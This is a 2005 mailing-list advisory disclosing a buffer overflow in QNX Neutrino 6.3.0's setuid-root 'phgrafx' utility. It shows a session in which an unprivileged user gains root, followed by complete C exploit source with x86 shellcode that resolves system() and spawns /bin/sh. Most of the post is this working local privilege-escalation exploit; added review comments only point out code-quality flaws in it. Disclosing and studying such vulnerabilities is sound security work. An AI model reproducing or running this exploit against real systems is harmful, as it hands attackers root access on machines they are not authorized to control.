
possible privilege escalation on QNX Neutrino 6.3.0



pasquale minervini
30/11/05, 07:00
A buffer overflow vulnerability in the "phgrafx" utility included in the QNX Neutrino Realtime Operating System can potentially be exploited by malicious users to escalate their privileges (by default the application is setuid and owned by root).

example:

qnx$ uname -a; id
QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
qnx$ gcc phex.c -o phex -W
qnx$ ./phex
shellcode length: 21
address: 0x8047a2c
Warning: can not find palette under '5=B0|=D8H=E61=B0'.
# id
uid=6(deadbeef) gid=1(bin) euid=0(root) groups=0(root),3(sys),4(adm),5(tty)
#

source:

/*
* minervini@neuralnoise.com (c) 2005, all rights reserved.
* sample exploit for phgrafx on QNX 6.3.0 x86
*
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
*/

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>

/* NOTE(review): both `_PATH` and `_RET_INIT` begin with an underscore
* followed by an uppercase letter, a form the C standard reserves for the
* implementation; a project-prefixed name would avoid collisions with
* system headers. Both may be overridden at compile time. */
#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif

#ifndef _RET_INIT
# define _RET_INIT (864)
#endif

/* thanks to my friend pi3, who suggested calling a libc
* function to make the shellcode much shorter than it was */

/* Payload bytes that main() copies into the argument buffer; the trailing
* comment on each line gives the instruction the byte sequence encodes. */
char scode[] =3D "\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x54" // push %esp
"\xbb\xEF\xBE\xAD\xDE" // mov $0xDEADBEEF,%ebx
"\xff\xd3"; // call *%ebx

/* Copies %esp into %eax via inline asm and then falls off the end of a
* non-void function with no return statement. The value the caller
* receives is therefore not defined by the C language and depends on the
* compiler and optimisation level in use. */
unsigned long get_sp (void) {
__asm__ ("movl %esp, %eax");
}

/* Entry point: assembles the oversized argument buffer and hands it to the
* target binary through execl(). argv[1], when present, is parsed as a
* numeric offset applied to the value returned by get_sp().
* Returns -1 when the resolved address is rejected by the byte check below;
* otherwise the process image is replaced and 0 is reached only if execl()
* fails. */
int main (int argc, char **argv) {
=20
int i, slen =3D strlen (scode), offset =3D 0;
long ptr, *lptr, addr;
char *buf;
void *handle;
=20
/* dlopen(NULL) gives a handle to this process's own image; the dlsym()
* result is not checked for NULL before it is used below. */
handle =3D dlopen (NULL, RTLD_LAZY);
addr =3D (long) dlsym (handle, "system");
=20
for (i =3D 0; i < 4; i++) {
char temp =3D (*((char *) &addr + i) & 0xff);
if (temp =3D=3D 0x00 || temp =3D=3D 0x09 || temp =3D=3D 0x0a) {
puts
("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, =
so it probably won't work since"
" the application seems to truncate those bytes. BTW you can rely on f=
unctions like exec*(), spawn*()"
" or MsgSend*() to get this working.\n"
"more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino=
/lib_ref/");
return (-1);
}
}
=20
memcpy((char *)&scode + 0xf, &addr, 4);
=20
/* No endptr/errno check: a non-numeric argv[1] silently becomes 0. */
if (argc > 1)
offset =3D strtoul(argv[1], NULL, 0);
=20
/* buf is never freed; irrelevant once execl() replaces the image, but it
* leaks on the path where execl() fails. */
if (!(buf =3D (char *) malloc(1032)))
err(1, "malloc()");
=20
memset(buf, 0, 1032);
=20
for (i =3D 0; i < (_RET_INIT - slen); i++)
buf[i] =3D 'A'; // inc %ecx
=20
printf("shellcode length: %d\n", slen);
=20
for (i =3D (_RET_INIT - slen); i < _RET_INIT; i++)
buf[i] =3D scode[i - (_RET_INIT - slen)];
=20
lptr =3D (long *) (buf + _RET_INIT);
=20
/* Side effect inside an argument list: ptr is assigned here and reused
* in the loop that follows. */
printf("address: 0x%lx\n", ptr =3D (get_sp () - offset));
=20
for (i =3D 0; i < ((1024 - _RET_INIT) / 4); i++)
*(lptr + i) =3D (int) ptr;
=20
/* execl() only returns on failure, and that failure is not reported:
* the return value is unchecked and the function then returns 0. */
execl(_PATH, "phgrafx", buf, NULL);
=20
return (0);
}

-- 
p. minervini, minervini@neuralnoise.com